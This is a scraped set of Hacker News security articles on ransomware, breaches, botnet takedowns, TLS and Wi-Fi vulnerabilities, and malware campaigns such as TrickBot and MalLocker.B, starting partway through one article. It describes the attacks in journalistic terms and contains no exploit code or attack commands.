The spike in attacks against corporate and critical infrastructure have also been increasingly accompanied by a tactic called ""triple extortion,"" wherein sensitive data on a target's systems is extracted prior to locking up through encryption, followed by applying pressure on victim companies into paying up by threatening to publish the stolen data online, failing which, the attackers then adopt a third phase, using that data to blackmail its customers or launch DDoS attacks.
""Through our security controls and protocols, we identified irregular activity in one of our environments. We immediately contained the matter and isolated the affected servers. We fully restored our affected systems from back up. There was no impact on Accenture's operations, or on our clients' systems,"" Accenture said in a statement shared with The Hacker News.
Why Hackers Can't take down DNS root servers ?,https://thehackernews.com/2012/03/why-hackers-cant-take-down-dns-root.html,"Why Hackers Can't take down DNS root servers ?
Interpol Chief Ronald Noble on Friday warned that a group of hackers might try to shut down internet service tomorrow. The hacking group, Anonymous, is protesting against several reasons including the crash of Wall Street and irresponsible leaders.
There are 13 DNS servers that host the core databases for translating IP addresses. Anonymous hackers have announced ""Operation Global Blackout"", promising to cause an Internet-wide blackout by disabling the core DNS servers.
Anonymous Hackers wants to bombard those 13 servers with traffic using a distributed denial of service attack. If the servers get too overloaded, they'll crash and therefore be unable to fulfil DNS lookups rendering all domain names useless.
But there are lots of Limitations in this type of attack :
There are 13 Root Servers out there, It it not possible to shut down every of them. Even every root server is under control of various companies and they have different hardware and different ways to protect it. If any root server will get down, They can migrate it to other servers.
Anonymous Issue the Date i.e 31 march 2012 for there attack, obviously there will be 100's of Security Experts aware about the attack and working at backend for Security and resolving the issues.
Internet users don't use Root servers service directly, they are the master servers. Whereas internet users are connected to slave servers , provided by their internet service provider (ISP). Slave servers synchronice there data with root servers (master servers).
Root servers are implemented as clusters of hosts using anycast addressing. Anycasting is a tweek to the Internet routing table so that traffic destined for an IP address is redirected to a different local server.
Meanwhile, Interpol has launched Operation Unmask to deal with the group and arrested 31 alleged members in two different phases in February and March, 2012. There are around 2.3 billion internet users in the world and more than one million of them are affected by cybercrime every year while $388 billion dollars is the global cost of such crimes.
Conclusion : According to us ( The Hacker News) , Hackers strongly not able to shut down the internet. So what do you think , that Anonymous will manage to shut down the web?
Latvian Woman Charged for Her Role in Creating Trickbot Banking Malware,https://thehackernews.com/2021/06/latvian-woman-charged-for-her-role-in.html,"The U.S. Department of Justice (DoJ) on Friday charged a Latvian woman for her alleged role as a programmer in a cybercrime gang that helped develop TrickBot malware.
The woman in question, Alla Witte, aka Max, 55, who resided in Paramaribo, Suriname, was arrested in Miami, Florida on February 6. Witte has been charged with 19 counts, including conspiracy to commit computer fraud and aggravated identity theft, wire and bank fraud affecting a financial institution, and money laundering.
According to heavily redacted court documents released by the DoJ, Witte and 16 other unnamed cohorts have been accused of running a transnational criminal organization to develop and deploy a digital suite of malware tools with an aim to target businesses and individuals worldwide for theft and ransom.
Since its origin as a banking Trojan in late 2015, TrickBot has evolved into a ""crimeware-as-a-service"" capable of pilfering valuable personal and financial information and even dropping ransomware and post-exploitation toolkits on compromised devices, in addition to recruiting them into a family of bots. The group is said to have primarily operated out of Russia, Belarus, Ukraine, and Suriname.
Largely propagated through phishing and malspam attacks, TrickBot is designed to capture online banking login credentials and hoover other personal information, such as credit card numbers, emails, passwords, dates of birth, social security numbers, and addresses, with the captured credentials abused to gain illicit access to online bank accounts, execute unauthorized electronic funds transfers, and launder the money through U.S. and foreign beneficiary accounts.
TrickBot also emerged on the threat landscape coinciding with the disbanding of the malware crew behind Dyre after the latter's rapid rise to prominence was curtailed in November 2015, when Russia's Federal Security Service (FSB) purportedly made numerous arrests of individuals suspected of being part of the group.
""In the months and years following the Russian authorities' purported actions, the Dyre actors regrouped and created a new suite of malware tools known as Trickbot,"" the DoJ said.
Accusing the defendants of plundering money and confidential information from unsuspecting businesses and financial institutions in the U.S., U.K., Australia, Belgium, Canada, Germany, India, Italy, Mexico, Spain, and Russia, the DoJ said Witte was a malware developer ""overseeing the creation of code related to the monitoring and tracking of authorized users of the Trickbot malware, the control and deployment of ransomware, obtaining payments from ransomware victims, and developing tools and protocols for the storage of credentials stolen and exfiltrated from victims infected by Trickbot.""
TrickBot notably suffered a huge blow to its infrastructure following twin efforts led by the U.S. Cyber Command and Microsoft to eliminate 94% of its command-and-control (C2) servers that were in use as well as any new servers the criminals operating TrickBot attempted to bring online to replace the previously disabled servers.
But these takedowns have only served as a temporary solution. Not only has the malware proven to be resilient to law enforcement actions, the operators have also bounced back by adjusting tactics and hosting their malware in other criminal servers that make use of Mikrotik routers.
""Witte and her associates are accused of infecting tens of millions of computers worldwide, in an effort to steal financial information to ultimately siphon off millions of dollars through compromised computer systems,"" said Special Agent in Charge Eric B. Smith of the FBI's Cleveland Field Office. ""Cyber intrusions and malware infections take significant time, expertise, and investigative effort, but the FBI will ensure these hackers are held accountable, no matter where they reside or how anonymous they think they are.""
If convicted on all charges, Witte faces a maximum penalty of no fewer than 90 years in prison.
Air India Hack Exposes Credit Card and Passport Info of 4.5 Million Passengers,https://thehackernews.com/2021/05/indias-flag-carrier-airline-air-india.html,"India's flag carrier airline, Air India, has disclosed a data breach affecting 4.5 million of its customers over a period stretching nearly 10 years after its Passenger Service System (PSS) provider SITA fell victim to a cyber attack earlier this year.
The breach involves personal data registered between Aug. 26, 2011 and Feb. 3, 2021, including details such as names, dates of birth, contact information, passport information, ticket information, Star Alliance, and Air India frequent flyer data as well as credit card data. But Air India said neither CVV/CVC numbers associated with the credit cards nor passwords were affected.
The airline had previously acknowledged the breach on March 19, stating that ""its Passenger Service System provider has informed about a sophisticated cyber attack it was subjected to in the last week of February 2021.""
In March, Swiss aviation information technology company SITA disclosed it suffered a ""highly sophisticated attack"" on its servers located in Atlanta, leading to a compromise of passenger data stored in its PSS system. SITA PSS is used by many carriers for processing airline passenger data as part of their frequent flyer programs.
Air India data breached in a major Cyber attack. Breach involves Passengers personal Information including Credit Card Info and Passport Details. Other Global Airlines are likely affected too.#airindia #CyberAttack @airindiain@rahulkanwal @sanket @maryashakil pic.twitter.com/XxUORgInJQ
— Jiten Jain (@jiten_jain) May 21, 2021
With the latest development, Air India joins a long list of airlines, such as Lufthansa, Cathay Pacific, Air New Zealand, Singapore Airlines, Scandinavian Airlines (SAS), Finnair, Malaysia Airlines, South Korea's Jeju Air, American Airlines, and United Airlines that have been impacted by the data security incident.
As part of its investigation into the event, Air India said it engaged external specialists and that it notified credit card issuers of the issue, besides resetting passwords of its frequent flyer program. The airline is also urging users to change passwords wherever applicable to thwart potential unauthorized attempts and ensure the safety of their personal data.
UPDATE: According to DarkTracer, the personal information stolen from Air India following the SITA PSS server breach is now being allegedly sold on underground data sale forums for $3,000.
New Raccoon Attack Could Let Attackers Break SSL/TLS Encryption,https://thehackernews.com/2020/09/raccoon-ssl-tls-encryption.html,"A group of researchers has detailed a new timing vulnerability in Transport Layer Security (TLS) protocol that could potentially allow an attacker to break the encryption and read sensitive communication under specific conditions.
Dubbed ""Raccoon Attack,"" the server-side attack exploits a side-channel in the cryptographic protocol (versions 1.2 and lower) to extract the shared secret key used for secure communications between two parties.
""The root cause for this side channel is that the TLS standard encourages non-constant-time processing of the DH secret,"" the researchers explained their findings in a paper. ""If the server reuses ephemeral keys, this side channel may allow an attacker to recover the premaster secret by solving an instance of the Hidden Number Problem.""
However, the academics stated that the vulnerability is hard to exploit and relies on very precise timing measurements and on a specific server configuration to be exploitable.
A Timing Attack to Leak Secret Keys
Using time measurements to compromise a cryptosystem and leak sensitive information has been the heart of many timing attacks, and Raccoon employs the same strategy to the Diffie-Hellman (DH) key exchange process during a TLS handshake, which is crucial to trading data over a public network securely.
This shared secret key generated during the exchange enables secure browsing on the Internet, allowing users to safely visit websites by protecting the communications against eavesdropping and man-in-the-middle (MitM) attacks.
To break this security wall, the malicious party records the handshake messages between a client and server, using it to initiate new handshakes to the same server, and subsequently measuring the time it takes for the server to respond to the operations involved in deriving the shared key.
It's worth noting that ""DH secrets with leading zeroes will result in a faster server KDF computation, and hence a shorter server response time.""
Assuming the attacker can identify this edge case, it allows the bad actor to decipher the secret key of the original handshake and ultimately decrypt the TLS traffic to recover its contents in plaintext.
But the attack has its constraints. It necessitates that the server reuses the same DH ephemeral key (a mode called DHE) across sessions and that the attacker is as close to the target server as possible to perform high precision timing measurements.
F5, Microsoft, Mozilla, and OpenSSL Release Security Updates
While Raccoon may be hard to replicate in the real world, several F5 products were found to be vulnerable to a ""special"" version of the attack (CVE-2020-5929) without resorting to timing measurements by directly observing the contents of server responses.
F5, Microsoft, Mozilla, and OpenSSL have all released patches to thwart the attack by addressing the concern with ephemeral key reuse. For its part, Mozilla has turned off DH and DHE cipher suites in its Firefox browser, and Microsoft's advisory recommends customers to disable TLS_DHE.
With ephemeral keys crucial for ensuring forward secrecy, the research is another reason why reusing cryptographic keys can undermine security.
""Our attack exploits the fact that servers may reuse the secret DH exponent for many sessions, thus forgoing forward secrecy,"" the researchers concluded.
""In this context, Raccoon teaches a lesson for protocol security: For protocols where some cryptographic secrets can be continuously queried by one of the parties, the attack surface is made broader. The Raccoon attack showed that we should be careful when giving attackers access to such queries.""
Massive DDoS Attack Against Dyn DNS Service Knocks Popular Sites Offline,https://thehackernews.com/2016/10/dyn-dns-ddos.html,"UPDATE — How an army of million of hacked Internet-connected smart devices almost broke the Internet today.
Cyber attacks are getting evil and worst nightmare for companies day-by-day, and the Distributed Denial of Service (DDoS) attack is one such attacks that cause a massive damage to any service.
Recently, the Internet witnessed a record-breaking largest DDoS attack of over 1 Tbps against France-based hosting provider OVH, and now the latest victim of the attack is none other than Dyn DNS provider.
A sudden outage of popular sites and services, including Twitter, SoundCloud, Spotify, and Shopify, for many users, is causing uproar online. It's because of a DDoS attack against the popular Domain Name System (DNS) service provider Dyn, according to a post on Ycombinator.
DNS act as the authoritative reference for mapping domain names to IP addresses. In other words, DNS is simply an Internet's phone book that resolves human-readable web addresses, like thehackernews.com, against IP addresses.
Dyn DNS is used by many websites and services as their upstream DNS provider, including Twitter, Spotify, SaneBox, Reddit, Box, Github, Zoho CRM, PayPal, Airbnb, Freshbooks, Wired.com, Pinterest, Heroku and Vox Media properties.
All of these sites and services are reportedly experiencing outages and downtime, either completely or partially.
Here's an internet outage map from Level3:
According to Dyn DNS, the DDOS started at 11:10 UTC and is mostly affecting its customers in the East Coast of the United States, specifically Managed DNS customers.
""We are aware of the ongoing service interruption of our Managed DNS network. For more information visit our status page,"" Dyn tweeted.
At the time, it's not clear who is behind this DDoS attack, but the company said its engineers are working on ""mitigating"" the issue.
Here's the statement posted by Dyn on its website:
""This attack is mainly impacting US East and is impacting Managed DNS customers in this region. Our Engineers are continuing to work on mitigating this issue.
Starting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.
Customers with questions or concerns are encouraged to reach out to our Technical Support Team.""
What websites are down for you? Let us know in the comments below.
We'll update the story as soon as we get to hear more about the attack. Stay Tuned!
"University Pays Hackers $20,000 to get back its Ransomware Infected Files",https://thehackernews.com/2016/06/university-ransomware.html,"What's the worst that could happen when a Ransomware malware hits University?
Last month, the IT department of the University from where I have done my graduation called me for helping them get rid of a Ransomware infection that locked down all its student's results just a day before the announcement.
Unfortunately, there was no decrypter available for that specific ransomware sample, but luckily they had the digital backup for the examination results in the form of hundreds of excel sheets.
So, somehow backup helped administrator to re-compile complete result once again into the database, but this delayed the announcement for over 30 days.
However, the situation is not same every time.
Recently, the University of Calgary in Alberta paid a ransom of $20,000 to decrypt their computer systems' files and regain access to its own email system after getting hit by a ransomware infection.
The University fell victim to ransomware last month, when the malware installed itself on computers, encrypted all documents and demanded $20,000 in Bitcoins to recover the data.
Also Read: Ransomware attacks on Hospitals put Patients at Risk
Since the University obviously was not properly backing up the data, the administrators have agreed to pay up the ransom amount, the university announced in a release Tuesday, after a cyber attack that left students and staff unable to access university-issued PCs, email or Skype.
""As part of efforts to maintain all options to address these systems issues, the university has paid a ransom totaling about $20,000 CDN that was demanded as part of this 'ransomware' attack,"" Linda Dalgetty, VP of finance and services at the University said in a release.
The University assured its staff and students that no personal or University data was released to the public and that it is working with Calgary police to investigate the cyber attack that affected more than 100 computers.
The university's IT department is still in the process of assessing and evaluating the decryption keys and is working to recover data and ensure all of the affected systems are operational again.
The University also confirmed the decryption keys provided by the attacker worked successfully. The email service for its students and staff was brought back yesterday, but not on the original University system.
The University did not further comment on how the infection made its way into their systems and networks.
Also Read: Ransomware attacks Shuts Down Electric and Water Utility.
We saw an enormous rise in Ransomware threats, both in numbers and sophistication. You would be surprised to know about the latest version of Cerber ransomware that generates a different sample in every 15 seconds in order to bypass signature-based antivirus software.
One of the best first steps in securing your environment is to deploy automated and isolated backup mechanism, along with an Intrusion detection system (IDS) at the network level as well as host-based IDS on your critical assets.
IDS gives you detailed insight into what exactly is coming across the wire, instead of just relying on signature-based antivirus and anti-malware software.
You can try AlienVault Unified Security Management (USM) that includes an inbuilt IDS with SIEM and real-time threat intelligence to help you quickly detect malware and other threats in your network.
Millions of Android Devices Using Broadcom Wi-Fi Chip Can Be Hacked Remotely,https://thehackernews.com/2017/07/android-ios-broadcom-hacking.html,"Google has released its latest monthly security update for Android devices, including a serious bug in some Broadcom Wi-Fi chipsets that affects millions of Android devices, as well as some iPhone models.
Dubbed BroadPwn, the critical remote code execution vulnerability resides in Broadcom's BCM43xx family of WiFi chipsets, which can be triggered remotely without user interaction, allows a remote attacker to execute malicious code on targeted Android devices with kernel privileges.
""The most severe vulnerability in this [runtime] section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of an unprivileged process,"" Google describes in the July 2017 Android Security Bulletin.
The BroadPwn vulnerability (CVE-2017-3544) has been discovered by Exodus Intelligence researcher Nitay Artenstein, who says the flawed Wi-Fi chipset also impacts Apple iOS devices.
Since Artenstein will be presenting his finding at Black Hat 2017 event, details about the BroadPwn bug is scarce at this moment.
""The Broadcom BCM43xx family of Wi-Fi chips is found in an extraordinarily wide range of mobile devices – from various iPhone models to HTC, LG, Nexus and practically the full range of Samsung flagship devices,"" the abstract for Artenstein's talk says.
Besides the fix for the BroadPwn vulnerability, July's Android Security Bulletin includes patches for 10 critical, which are all remote code execution bugs, 94 high and 32 moderate rated vulnerabilities.
Two months ago, an over-the-air hijacking vulnerability was discovered in Broadcom WiFi SoC (Software-on-Chip) chips, allowing attackers within the same WiFi network to remotely hack, iPhones, iPads, iPods and Android handsets without any user interaction.
At that time, Apple rushed out an emergency iOS patch update to address the serious bug, and Google addressed the flaw in its Android April 2017 security updates.
Android Security Bulletin: July 2017 Updates
Among the other critical flaws is a long list of vulnerabilities in the Mediaserver process in the Android operating system, which also allows attackers to perform remote code execution on the affected devices.
One of the vulnerabilities is an issue with the way the framework handles some specific files. The libhevc library has an input validation vulnerability (CVE-2017-0540), which can be exploited using a crafted file.
""A remote code execution vulnerability in libhevc in Mediaserver could enable an attacker using a specially crafted file to cause memory corruption during media file and data processing,"" the vulnerability description says.
""This issue is rated as Critical due to the possibility of remote code execution within the context of the Mediaserver process.""
The over-the-air updates and firmware for Google devices have already been issued by the company for its Pixel and Nexus devices, though rest of Android still need to wait for an update from their OEMs, leaving million of Android devices vulnerable for next few months.
Take down of fifth most widespread 'Virut Botnet',https://thehackernews.com/2013/01/take-down-of-fifth-most-widespread.html,"NASK the domain registrar that operates the "".pl"" Polish top-level domain registry has seized multiple domains used for cyber crime activities by spreading Waledac malware distributed by the Virut botnet. According to Poland's Computer Emergency Response Team, Virut was first detected in 2006 and became a serious threat with an estimated size of more than 300,000 compromised computers.
NASK said that on Thursday it began assuming control over 23 .pl domains that were being used to operate the Virut network. Virut was responsible for 5.5% of infections in Q3 2012, making it the fifth most widespread threat of the time.
They determined that botnet consists of more than 308,000 uniquely compromised machines and that its primary function is to pump out spam and other malicious emails. The most recent take down effort was in December 2012. Unfortunately, the Virut botnet gang managed to get the malicious botnet domain names moved to a new registrar called home.pl quickly.
Symantec reported that with some 77,000 Waledac infected machines within the Virut botnet generating an average of 2,000 spam messages an hour for somewhere between 8 and 24 hours a day.
The Virut take down effort clearly illustrates the important and meaningful role registries and registrars can play in the fight against cyber crime in general. How long the shut-down of Virut will last this time is unknown.
Tor Browser Zero-Day Exploit Revealed Online – Patch Now,https://thehackernews.com/2018/09/tor-browser-zero-day-exploit.html,"Zerodium, the infamous exploit vendor that earlier this year offered $1 million for submitting a zero-day exploit for Tor Browser, today publicly revealed a critical zero-day flaw in the anonymous browsing software that could reveal your identity to the sites you visit.
In a Tweet, Zerodium shared a zero-day vulnerability that resides in the NoScript browser plugin comes pre-installed with the Mozilla Firefox bundled in the Tor software.
NoScript is a free browser extension that blocks malicious JavaScript, Java, Flash and other potentially dangerous content on all web pages by default, though users can whitelist sites they trust.
According to Zerodium, NoScript ""Classic"" versions 5.0.4 to 'Safest' security level enabled--included in Tor Browser 7.5.6 can be bypassed to run any JavaScript file by changing its content-type header to JSON format.
In other words, a website can exploit this vulnerability to execute malicious JavaScript on victims' Tor browsers to effectively identify their real IP address.
It should be noted that the latest version of Tor browser, i.e., Tor 8.0, is not vulnerable to this flaw, as the NoScript plugin designed for the newer version of Firefox (""Quantum"") is based upon a different API format.
Therefore, Tor 7.x users are highly recommended to immediately update their browser to the latest Tor 8.0 release.
NoScript has also fixed the zero-day flaw with the release of NoScript ""Classic"" version
CISCO vulnerability allows remote attacker to take control of Windows system,https://thehackernews.com/2013/08/cisco-vulnerability-allows-remote.html,"Cisco has fixed a critical vulnerability in Secure Access Control Server for Windows that could allow remote attackers to execute arbitrary commands and take control of the underlying operating system.
Cisco Secure ACS is an application that allows companies to centrally manage access to network resources for various types of devices and users.
The reported flaw affects Cisco Secure ACS for Windows versions 4.0 through Successful exploitation requires that Cisco Secure Access Control Server is configured as a RADIUS server EAP-FAST authentication.
The Cisco Security advisory said:
""The vulnerability is due to improper parsing of user identities used for EAP-FAST authentication. An attacker could exploit this vulnerability by sending crafted EAP-FAST packets to an affected device. An exploit could allow the attacker to execute arbitrary commands on the Cisco Secure ACS server and take full control of the affected server,""
The newly patched vulnerability is identified as CVE-2013-3466 and received the maximum severity score, 10.0 in the Common Vulnerability Scoring System (CVSS).
Cisco has released free software updates that address the vulnerability described in this advisory. This vulnerability is first fixed in Cisco Secure ACS for Windows release
MtGox Hacker tricks people to install Bitcoin Stealer,https://thehackernews.com/2014/03/mtgox-hacker-tricks-people-to-install.html,"This News will blow everyone's mind! If you are a bitcoins holder then you might be aware of MtGox, Once the World's biggest Bitcoin exchange. MtGox filed for bankruptcy last month after saying it lost some 8,50,000 Bitcoins to hackers and suddenly went dark with no explanations.
A few days ago, some unknown hacker breached into the personal blog and Reddit account of MTgox CEO, Mark Karpeles to level charges of fraud. But, Hackers are very clever to avail every eventuality they get.
After compromising the MtGox CEO's blog, the hacker posted a 716MB ZIP file, MtGox2014Leak.zip, which contains the data dump and specialized software tools for remote access to MtGox data, but these software tools turned out to be a Bitcoin wallet stealing malware, according to the research carried out by the Kaspersky Lab Expert, Sergey Lozhkin.
The application was actually a malware, which was created to search and steal Bitcoin wallet files from the victims' computer. The hackers took advantage of the people keen interest in the latest MtGox topic that abruptly stopped trading because of security lapse.
The Executable uploaded along with the archive tricks users into believing that they have access to databases of MtGox using the software, which is in fact a Bitcoin Miner.
So, the whole MtGox leak was invented to infect the victims' computers with Bitcoin stealer malware.
""We detect the Windows Trojan (MD5:c4e99fdcd40bee6eb6ce85167969348d), a 4.3MB PE32 executable, as Trojan.Win32.CoinStealer.i and OSX variant as Trojan.OSX.Coinstealer.a. Both have been created with the Livecode programming language – an open-source and cross-platform application development language."" according to Kaspersky.
The malware works on both Mac OS X and Windows, executes the TibanneSocket.exe binary. It would seek out bitcoins (bitcoin.conf and wallet.dat files) on an infected computer and then send them to the Command and Control server of the malware, which was located in Bulgaria, but down for now.
Readers are advised to keep an eye on the spam emails, dressed up to look like MtGox emails and asking for MtGox and bank account details. Do not download softwares from non-trusted sources and keep your antivirus up-to-date. Stay Secure!
Snapd Flaw Lets Attackers Gain Root Access On Linux Systems,https://thehackernews.com/2019/02/snapd-linux-privilege-escalation.html,"Ubuntu and some other Linux distributions suffer from a severe privilege escalation vulnerability that could allow a local attacker or a malicious program to obtain root privileges and total control over the targeted system.
Dubbed ""Dirty_Sock"" and identified as CVE-2019-7304, the vulnerability was discovered by security researcher Chris Moberly, who privately disclosed it to Canonical, the maker of Ubuntu, late last month.
The vulnerability resides in the REST API for snapd service, a universal Linux packaging system that makes an application compatible for various Linux distributions without requiring any modification.
Built by Canonical, snapd comes by default installed on all versions of Ubuntu and also used by other Linux distributions, including Debian, OpenSUSE, Arch Linux, Solus, and Fedora.
Snap packages are basically applications compressed together with their dependencies that also includes instructions on how to run and interact with other software on various Linux systems for desktop, cloud, and Internet of Things.
Snap locally host a web server (UNIX_AF socket) to offer a list of RESTful APIs that help the service perform various actions on the operating system. These REST APIs come with access control to define user-level permission for specific tasks. Some powerful APIs are only available to root users while others can be accessed by low-privileged users.
According to Moberly, a flaw in the way the access control mechanism checks the UID associated with any request made to a server allows attackers to overwrite the UID variable and access any API function, including those that are restricted for the root user.
""Snapd versions 2.28 through 2.37 incorrectly validated and parsed the remote socket address when performing access controls on its UNIX socket,"" Ubuntu explains in its advisory. ""A local attacker could use this to access privileged socket APIs and obtain administrator privileges.""
However, it should be noted that since the Dirty Sock exploit leverages local privilege escalation flaw, it does not allow hackers to compromise a vulnerable Linux system remotely.
Moberly has also released two proofs-of-concept (PoC) exploits on GitHub today, one of which requires an SSH connection while the other is able to sideload a malicious snap by abusing this API.
Canonical has released snapd version Snapd 2.37.1 this week to address the vulnerability, and Ubuntu and other major Linux distributions have already rolled out a fixed version of their packages.
Linux users are highly recommended to upgrade their vulnerable installations as soon as possible.
"Malware Variants: More Sophisticated, Prevalent and Evolving in 2021",https://thehackernews.com/2021/04/malware-variants-more-sophisticated.html,"A malicious program intended to cause havoc with IT systems—malware—is becoming more and more sophisticated every year. The year 2021 is no exception, as recent trends indicate that several new variants of malware are making their way into the world of cybersecurity.
While smarter security solutions are popping up, modern malware still eludes and challenges cybersecurity experts.
The evolution of malware has infected everything from personal computers to industrial units since the 70s. Cybersecurity firm FireEye's network was attacked in 2020 by hackers with the most sophisticated form of hacking i.e., supply chain.
This hacking team demonstrated world-class capabilities to disregard security tools and forensic examination, proving that anybody can be hacked. Also, the year 2021 is already witnessing a bump in COVID-19 vaccine-related phishing attacks.
Let's take a look at the trends that forecast an increase in malware attacks:
COVID-19 and Work-from-Home (WFH)
In the wake of the COVID-19 pandemic last year, many companies offered remote access to their workforce. Poor remote infrastructure made their networks considerably less open and exposed. Recent research by Deloitte indicates that cybercriminals are exploiting the COVID-19 environment to attack companies, as approximately 24% of employees reported an increase in spam, fraudulent e-mails, and phishing attacks.
As many as 26% of employees keep copies of their company's important data in case of technical difficulty when working remotely. This also poses serious data theft security concerns. This puts remote-working organizations at risk to hackers who use modern malware to target them.
Evolution of Malware Variants in Q1 2021
This year has already seen several new malware variants appear. As of February 2021, some of the most dangerous malware reported can be seen as follows –
Fake updates through e-mail —This method involves hackers sending a phony e-mail to users telling them that there is an important update to install. The update is ransomware that encrypts users' documents. By blackmailing the user with severe consequences, including data theft, then asks for a ransom.
News updates — Cybercriminals send electronic news updates to users in this kind of attack. If the users unknowingly click one of these links, they provide the hackers with free access to their devices.
AI and IoT attacks — The new trend in cybercrime is that criminals create some of the most deadly viruses using Artificial Intelligence to get inside any network. Moreover, they can penetrate IoT devices to gain access to confidential information like passwords.
Cryptojacking — A hacker installs Crypto Jacking malware on mobile phones or computers and mines cryptocurrencies.
Clop — Runs on Windows by blocking its different processes, Clop Ransomware that encrypts user files undetected.
RaaS — Also known as Ransomware as a Service, has been hailed as one of the most widespread malware distribution methods this year. The term refers to cybercrime as a service provided by a network of hackers for someone else.
Route to Adequate Malware Protection
In today's environment of increasing complexity and advances in malware threats, it is imperative to safeguard against malware.
Learning and Adapting
Cybercriminals now use a variety of malicious software to compromise a computer system at every stage. For example, hackers can use phishing techniques to gain access to a network then use Emotet to spread across the system by exploiting network loopholes. After that, the attackers use malware such as Trickbot to collect valuable information such as financial details, customer details, credit card details, etc. In the final stage, malware like Conti would encrypt the files and ask for ransom.
Security teams can stay updated with the best information on the latest variants, capabilities, and potential impact if they know how the malware operates at various stages in a system. Knowing this information will allow them to devise protective measures against the network's resources.
Reducing remote work-related security vulnerabilities
With the outbreak of the Coronavirus in early 2020, the work environment changed dramatically. It has been almost a year since the virus made employees stay indoors. With the proliferation and thinning of network perimeters, WFH has exposed its infrastructure to malware threats. Because of this, organizations must take into consideration the WFH's cybersecurity arrangements. Furthermore, they must use robust security software on employee systems and use VPN for all work-related activities on the internet.
Employee awareness
Employees play a vital role in ensuring their company's cybersecurity bubble remains intact. Many malware campaigns begin by sending an e-mail communication to employees. To learn basic cybersecurity hygiene, employees must become familiar with password management, identify and report security threats, and recognize suspicious behavior. Regular content and training will assist employees in countering any malware threats they encounter.
Adopt a Culture of Comprehensive Security
Given the ongoing evolution of malware attacks and their capability to surpass what they were capable of, organizations should prioritize a strong malware protection strategy. Consultation with experienced cybersecurity experts like Indusface can help them create a solution that meets their needs.
Watch Out — Microsoft Warns Android Users About A New Ransomware,https://thehackernews.com/2020/10/android-ransomware-lock.html,"Microsoft has warned about a new strain of mobile ransomware that takes advantage of incoming call notifications and Android's Home button to lock the device behind a ransom note.
The findings concern a variant of a known Android ransomware family dubbed ""MalLocker.B"" which has now resurfaced with new techniques, including a novel means to deliver the ransom demand on infected devices as well as an obfuscation mechanism to evade security solutions.
The development comes amid a huge surge in ransomware attacks against critical infrastructure across sectors, with a 50% increase in the daily average of ransomware attacks in the last three months compared to the first half of the year, and cybercriminals increasingly incorporating double extortion in their playbook.
MalLocker has been known for being hosted on malicious websites and circulated on online forums using various social engineering lures by masquerading as popular apps, cracked games, or video players.
Previous instances of Android ransomware have exploited Android accessibility features or permission called ""SYSTEM_ALERT_WINDOW"" to display a persistent window atop all other screens to display the ransom note, which typically masquerade as fake police notices or alerts about purportedly finding explicit images on the device.
But just as anti-malware software began detecting this behavior, the new Android ransomware variant has evolved its strategy to overcome this barrier. What's changed with MalLocker.B is the method by which it achieves the same goal via an entirely new tactic.
To do so, it leverages the ""call"" notification that's used to alert the user about incoming calls in order to display a window that covers the entire area of the screen, and subsequently combines it with a Home or Recents keypress to trigger the ransom note to the foreground and prevent the victim from switching to any other screen.
""This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as a system window,"" Microsoft said.
Aside from incrementally building on an array of aforementioned techniques to show the ransomware screen, the company also noted the presence of a yet-to-be-integrated machine learning model that could be used to fit the ransom note image within the screen without distortion, hinting at the next stage evolution of the malware.
Furthermore, in an attempt to mask its true purpose, the ransomware code is heavily obfuscated and made unreadable through name mangling and deliberate use of meaningless variable names and junk code to thwart analysis, the company said.
""This new mobile ransomware variant is an important discovery because the malware exhibits behaviors that have not been seen before and could open doors for other malware to follow,"" Microsoft 365 Defender Research Team said.
""It reinforces the need for comprehensive defense powered by broad visibility into attack surfaces as well as domain experts who track the threat landscape and uncover notable threats that might be hiding amidst massive threat data and signals.""
Malicious Kindle Ebook Let Hackers Take Over Your Amazon Account,https://thehackernews.com/2014/09/malicious-kindle-ebook-lets-hackers.html,"If you came across a Kindle e-book download link from any suspicious sources or somewhere other than Amazon itself, check twice before you proceed download. As downloading an eBook could put your personal information at risk.
A security researcher has uncovered a security hole in Amazon's Kindle Library that could lead to cross-site scripting (XSS) attacks and account compromises when you upload a malicious ebook.
The flaw affects the ""Manage Your Content and Devices"" and ""Manage your Kindle"" services in Amazon's web-based Kindle Library, which could allow a hacker to inject and hide malicious lines of code into into e-book metadata, such as the title text of an eBook, in order to compromise the security of your Amazon account.
Gaining access to your Amazon account credentials is one of the biggest boons for hackers, as they can set-up new credit cards in your account or max out the current ones on file with some big Amazon purchases. Additionally, they could compromise your other online accounts with the help of those credentials and personal information contained in your Amazon account.
The vulnerability, which could be exploited when a user downloads a malicious e-book, was originally discovered by German security researcher Benjamin Daniel Mussler in October last year and was subsequently fixed by the retail giant in December.
However, the flaw was re-introduced after an update to the Manage Your Kindle page, and has been active since at least July this year, despite being reported by Mr Mussler to Amazon's security team. After hearing no reply from the company for several months, he decided to go public with the flaw. And at the time of writing, Amazon's Kindle Library is vulnerable to Cross-Site Scripting (XSS) attacks, according to Mr Mussler.
Amazon's ""Send to Kindle"" plugin for Windows and Mac helps users to send their personal documents to their Kindle devices, including ebook files obtained from other sources as well. You can archive these documents in your Kindle Library on the cloud to easily zap them to all your Kindles at any time.
Mr Mussler continued that once a hacker manages to load your Kindle Library with a corrupted e-book, (typically with a title like ), the account cookies can be accessed by and transferred to the attacker. As a result, your Amazon account can be compromised, which could potentially expose users' personal addresses, payment details and order history as well.
""Malicious code can be injected via ebook metadata; for example, an ebook's title,"" wrote Mr Mussler on his personal blog, adding that ""the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised.""
According to Mr Mussler, Amazon used his proof of concept attack code during its testing of the Manage your Kindle page and was surprised that an oversight suggests that the exploit is active. But, users who stick to e-books sold and delivered by Amazon are safe.
Thankfully, the exploit only affects users who download pirated eBooks from dubious sources, so don't worry about adding an eBook to your Amazon shopping cart any time soon.
Google Nexus phone vulnerable to SMS-based DOS attack,https://thehackernews.com/2013/11/Flash-sms-dos-attack-Google-Nexus.html,"Google's Nexus Smartphones are vulnerable to SMS-based DOS attack, where an attacker can force it to restart, freeze, or lose network connection by sending a large number of special SMS messages to them.
The vulnerability, discovered by Bogdan Alecu, a system administrator at Dutch IT services company Levi9, and affects all Android 4.x firmware versions on Google Galaxy Nexus, Nexus 4 and Nexus 5.
